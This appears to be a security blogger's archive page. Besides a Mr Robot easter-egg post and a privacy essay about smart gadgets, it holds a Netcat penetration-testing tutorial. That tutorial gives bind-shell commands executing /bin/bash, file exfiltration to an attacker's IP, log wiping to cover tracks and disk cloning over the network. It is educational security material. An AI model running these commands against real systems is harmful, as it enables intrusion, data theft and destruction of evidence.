Thursday, July 14, 2016

Mr Robot Season 2 Easter Eggs: Ransomware Message Revealed and Decoded!

Hello folks!  I'm sure you have heard about the most popular TV Show of 2015 and perhaps of 2016, multiple awards winning TV sensation of Mr Robot.  I don't like TV shows and don't watch TV at all, but I got caught with Season 1 because of the hacking techniques the main character uses which sound and seem pretty legitimate (as well as the terms).  So, Season 2 took off yesterday but there has been a lot of work done on the Internet about it before then not only on their website, but also outside of it;  including Easter eggs!  Easter eggs are "secrets" buried in layers for people to find out.  I have stumbled to a few great surprises but one was worth noting.  After they released Episode 1 before the air-date, kept me wondering...

Episode 1 concludes in a Ransomware attack to evil corp banks which leaves their computer inoperable.  I could take a screenshot of it and decided to investigate the victim's IP address (which is public by the way) and found something interesting.  There seemed to be a message buried behind the timer which resets every-time you open the website, but what if I could stop the timer and let it go to 00:00:00? What would happen when the timer sets to 0?  Watch the video, learn a little about JS and base64 encoding (where the message is buried), grab some pop-corn and enjoy the video.... Dubtstep style!


How Can a 10 Year Old Have Administrator Access to Your Fortified Windows 8 and 10 Computer

Hello there. I have been a bit busy working and on-side projects so I would like to share with you some old work I have done before which I haven't shared on my Blog.  Even though I have done a similar video with Windows 7.  This shows that the principle of this flaw does not rely on software but in the design of it.  Since Micro$oft is too busy fixing more "relevant" bugs, I am posting this only for educational purposes.  I am not responsible nor condone illegal acts.


Now, watch and enjoy!

Windows 8:




Windows 10:


Wednesday, April 20, 2016

Old-school Pentesting with Netcat


I have been asked to write an article for PentestMag and here it is. Enjoy it

Netcat has been created by “Hobbit” and its first stable released was in 2007. We all know Netcat’s legendary remark for being the “Swiss army knife” for pentesting, but do we really know everything about it? We all have used Netcat for one thing or another, but the truth is that with Netcat can be used for a plethora of things!

If you had to do some sort of security certifications or simply done some cyber-security courses, you will come across up with the famous phases of “hacking”:



1. Reconnaissance

2. Scanning

3. Gaining Access

4. Maintaining Access

5. Covering Tracks

We all have used Netcat to do any of these functions in many ways. We even tried to make a chat client and perhaps even transferred files over a network; but did we ever used Netcat at its fullest and at every phase of Pentesting? Let’s check:


Step 1: Reconnaissance

We can perform banner grabbing in order to determine the web server type and version they have as well as any other service’s version. Sure, we can do this with Telnet, but Netcat does not alter the stream of data and supports TCP as well as UDP unlike Telnet. The command for Netcat banner grabbing is the following:



nc [IP address] [port number]



A practical example would be:



Please, note that is very useful to use this method because it tells us not only the web application’s server but also its version which you might want to consider skipping step 2.


You can also trying to enter HEAD / OPTIONS for get some response header stating scripting language which the web server is primarily written on (in this case PHP):




If we try the same syntax by changing the port number, we will get interesting results if the ports are opened:




Step 2: Scanning



If we try to scan for specific ports in order to find potential sensitive information through outdated software and/or web application versions on the server we can use the following command:


nc –vv –n –z –w1 [IP-address] [port number range]



In the screenshot we can see a clear example:



This is what every flag does: 


-vv: display more verbose message of the output.

-n: run the scan without resolving hostname.

-z: run the scan without sending any data to the target system.

-w1: wait no more than 1 sec to make each request.

IP address: IP Address of the host we want to scan

Port Numbers: A range can be used as well as skip individual ports separated by commas.

With this method, we can simply figure out what ports are being opened and which are closed by looking at the connection status (closed/open). If you would like more information about a certain port, you can try the banner grabbing technique to figure out what the version is.



Step 3: Gaining Access

How good is to have the whole system infrastructure layout and ‑knowing they are using an out of date version of a software as well as knowing it’s vulnerable if we can’t show the evidence by gaining access to the system? One very common way for Netcat to have access to a system is to send a crafted file which remotely creates a Netcat listener inbound connection to a given port back to the attacker. Note that the target system also has to have Netcat installed to accomplish this but this can be accomplished by:



1) Social Engineering the victim into installing it.

2) By performing phishing.

3) Physical access to the system.


Then, after the connection is being made, the attacker can easily connect to the listening port and IP of the target machine and remote execute code on his behalf. The snippet is as easy as this:


(Target’s machine)

nc –l –p [listening port] –v –e /bin/bash


 (Pentester’s machine)

nc [Target IP] [listening port]



Besides performing a bind shell to the client, you can also use Netcat to perform a reverse shell in case you want to proceed which is useful while performing in a NATed system. Unlike ports, reverse shell assigns a connection to the user (attacker) through a shell. Note: To attack the target’s machine which is behind a NAT, port-forwarding must be set up on the target’s machine IP and port.




Step 4: Maintaining Access

Netcat also has great functionalities which allows you to create backdoors in order to come back later to the system. We have seen how to create a listener thus creating the chance of having a backdoor to remote execute as well as retrieving files from the target machine; but how about copying files or exfiltrate data?

For this test, we used corporate_secrets.txt as the file we think the target machine has. To copy from the target’s machine to the Pentester’s machine, simply do the following:

(in target’s machine)

cat [file_to_exfiltritate]| nc [IP of Pentester] [Port]



(in Pentester’s machine)

nc –n –vv –p 1337 > [file_to_exfiltrate]



Visual Example:



Also copying files to the target’s system is possible:

(Target’s machine)

nc –lp 1337 > [file]



(Pentester’s machine)

nc [IP of target] < [file]



Visual Example :



Step 5: Covering Tracks



We know that every successful hack is not successful if we leave tracks all over the place. For this case, we can even delete logs by echoing to a blank space to the file or overwriting it with a chunk data or even copying over a fake log file overwriting it on the target system.



echo “ “ > log.txt


nc [victim IP] [port number] > log file.


Tips and Tricks



Chat Client



In one terminal, type:

nc –vlp 1337



In the other terminal type:

nc [IP of 1st terminal] 1337

Start typing



Visual Example:




Send spoofed HTTP Requests



nc [domain.com] 80



GET / HTTP/1.1

Host: domain.com

User-Agent: Who-Cares

Referrer: Noone.com

[Press Enter twice]



Visual Example:



Make an instant Web Server with Netcat


while true; do nc –lp 80 –q 1 < test.html; done



Visual Example:



Cloning Hard Drive Partitions over the network



dd if=/dev/sda | nc [IP address] 1337



Conclusion:


Netcat is more than simply a tool. The phase of hacking and penetration testing is simple but with Netcat it can be used and seen much simpler than what it really is. Netcat is been in the Pentesting industry for decades, but this article helps you to keep in touch with old and still reliable ways of taking over systems. It is true that with the help of Metasploit and the Meterpreter it is also possible to create backdoors and do more post-exploitation techniques but it is beyond this scope of this article. The purpose of it was to clarify that Netcat is still great and simple to do all phases of hacking.

Thursday, February 4, 2016

How Smart-Gadgets Outsmart Humans

As the Internet of Things (IoT) develops more and more within our daily lives, it is important to notice where all of this is heading to.  Twenty years ago, we haven't got nearly the same exposure to technology gadgets as we have now.  Without realizing it, we have become a lot more dependent on having our electronics and "wearables" telling us the weather, dictate our relationships, tell us where exactly to and how to get there and how long it will take us to get to a specific place.  Also, we rely on them to tell us more personal data, such as our calorie intake, how much we burnt and how much more we have to eat in order to be in the "ideal weight"; whether we have slept enough, what time we woke up, what we typically eat, etc.  Even though, some of the personal data we give up might help us to get where we want to go and be, we have to ask ourselves: how did our grandparents managed their weight, routes, calorie intake/outtake, predicting weather and manage their relationships? Have we got any better personally than our ancestors? Why are we relying so much on our "smart-gadgets" where people did not have those 20 years ago and yet they still lived in harmony and peace with themselves? How come there was less obesity before than now even though we have "smart" devices micro-managing what we eat and calorie count?


We have to realize that our lives have been changed unwillingly.  We have to face the reality that we are slaves to a system which condemn us to submit more and more to a machine of control. Living in an era where who has the information has control over the other, it seems we are not also losing but also we give out our information for free and even pay for it.  Jeremie Zimmermann once said that: "If someone knows everything about you and yet you don't know anything about such person, he has tremendous power over you". The whole concept of being smart is not on relying on smart wearable gadgets which sends our information out to third parties so we achieve a level of popularity in this naive world by posting it on Facebook, as well as to feed our commodities but to control what we share because we should have control over ourselves rather then exposing our "private maze".  The main problem for this is that people do not realize how exposing all this personal information puts them in danger and it enforces linking one information to the other in order to make a profile of us called (linkability).  We have to train our brain to this way because every-time we post something on social-media, every swipe of our club cards being linked back to us by using debit card and gets connected with every news feed we read, every website we visit, every call we make, every transmission we emit from our "smart" devices, etc. pose a danger to our privacy.  We need to realize and think before we share private information over the Internet and if it is worth to sacrifice private junks of our lives over a bit of fun, commodity, or simply a few cents of a dollar in our purchase does not make us better people.

The problem resides on private data being converted into useful, profitable information.  Nowadays, lots of people do not know the difference between public and private data because not only our our smart gadgets have crossed the line between them but also because we do it all the time without thinking twice about it. The worst thing of all is that people are always willing to sacrifice that trade-off because they do not see it as a choice. What is odd about it is that this does not have to happen within a secret society, with secret service agents sharing our data in a shady way, but it is done publicly and many of us even know and agree without knowing about it. The worst of all is that most people don't even realize what they are sacrificing in the first place.  Every decision point in our lives is a trade-off.



We have heard or at least know about them. These are companies that became giants because of the gathering of our personal data; also called "data-mining" and sharing it with third-parties and even governments.  Not only government agencies but also Big Data conglomerate machines such as Google, Facebook, Apple, LinkedIn, Amazon (to name a very few), acquire our data every single day and sell it to the highest bidder. Snowden's leaked articles  showed how these companies allowed the government to sniff directly from their servers' backbone and recollect our data as well as analyze it and store it indifferently without a court order.  Our data (personal and private) has value.  Maybe we do not value our data as much as we should but believe me, advertisement, medical, government agencies and insurance companies do.  For example, advertisement companies want our personal data so they can use it for targeted advertisement. Result: we buy more. Conclusion: the country gets richer in debt; which after all we will end up paying all of it with our taxes. Insurance companies want is so they can predict (in a shot and long period of time) if a particular person will be eligible for medical coverage in several years from now and if he is insurable. Result: we might not only end up losing our medical insurance but also being rejected by other insurance entities; or worse, giving us no choice than to join an insurance company with high costs. Medical companies would use it to determine if in a near future it would be cheaper for them to invest in you relying on a medicine pill, treatment or simply let you die if you come across a stroke or cancer by simply relying on statistic charts.  With enough data, they can even predict when you'll have the stroke and how to treat you without even asking or making you sign anything.

Pedometers help us statistically to control our weight, but people before then did not use to do that and the obese rate was way lower than what it is now.  At the same time, Big Data companies use it to help an insurance company to determine if you cover you and for how long by looking at your FitBit's heart heart, how long and when you work out, what you eat, how many calories you burn/take, how many glasses of water you drink, etc and the worst is that we put all that information for them.


Microsoft, Apple and Google have created gadgets in many forms, purpose and sizes which will keep shaping the way we live our lives. Every new product they release gets more intrusive and accurate as well as convenient for the user.  After all, they have to convince the user to buy it and use it every-day all the time so they can have more control over our lives. I've always loved technology but I also like to have control over my actions.  Now we face a situation where it are actions are becoming a problem because smart-gadgets have taken unconsciously decision power.  The problem will always be choice.  It is your duty to find it, understand it, analyze it and make a smart decision from it. We need to analyze if we are better off the old-fashioned way or relying on a cheap piece of plastic and programmable chip which actually can be hacked and make your life worse. The answer is to do hybrid, but the key is to know when to rely on technology and when it's a better idea to go old-fashioned.  Believe me, I love technology but I also like to have control over my information. Now, that is me. It is up to you to decide if you want to share personal information and/or how much information you are willing to share with them. As long people keep sharing their information, these big conglomerates will still be fed and will become stronger until one day we will wake up with no control over our lives.  By helping little by little, we can finally make a change. We need to outweigh the costs/risks/benefits and show these big and greedy companies who really is the smart one because ultimately, who has control over all information, has control over the world.



Sources:

Term of linkability
Movie - Terms and Conditions May Apply